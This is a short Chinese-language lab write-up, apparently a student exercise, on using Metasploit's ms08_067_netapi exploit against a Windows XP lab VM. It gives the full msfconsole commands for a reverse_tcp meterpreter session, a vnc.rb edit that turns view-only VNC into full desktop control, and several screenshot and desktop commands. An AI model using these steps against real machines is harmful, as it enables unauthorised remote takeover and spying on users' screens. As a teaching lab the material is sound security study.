Metasploit利用vnc图形化远程控制工具获得靶机远程控制桌面

问题描述

  分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。
  由于笔者没有配置Linux虚拟机,因此使用Windows XP SP3中文版作为靶机,并使用ms08_067作为渗透模块进行渗透。

解决办法

在msfconsole中使用命令:

use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.161.130
set LHOST 192.168.161.128
set TARGET 34
exploit

得到会话后使用命令run vnc获得靶机桌面。结果如下:
Metasploit利用vnc图形化远程控制工具获得靶机远程控制桌面_第1张图片

如何控制

  由于使用已经封装好的vnc只能进行靶机桌面的监控,并不能完成对靶机桌面的控制,因此想要完成对靶机的控制,需要对vnc.rb文件进行修改。
  在目录/usr/share/metasploit-framework/scripts/meterpreter/下找到vnc.rb文件,如下:

Metasploit利用vnc图形化远程控制工具获得靶机远程控制桌面_第2张图片

在该文件中找到pay的声明位置,在其后添加pay.datastore['ViewOnly'] = false后即可对远程桌面进行控制。

一些关于远程桌面的命令

enumdesktops   #查看可用的桌面
getdesktop   #获取当前 meterpreter 关联的桌面
set_desktop   #设置 meterpreter 关联的桌面 h 查看帮助
screenshot   #截屏
use espia   #或者使用 espia 模块截屏 然后输入 screengrab
run vnc   #使用使用vnc远程桌面连接

参考资料

Meterpreter run vnc 遇到的问题
metasploit 目录结构

你可能感兴趣的:(Metasploit)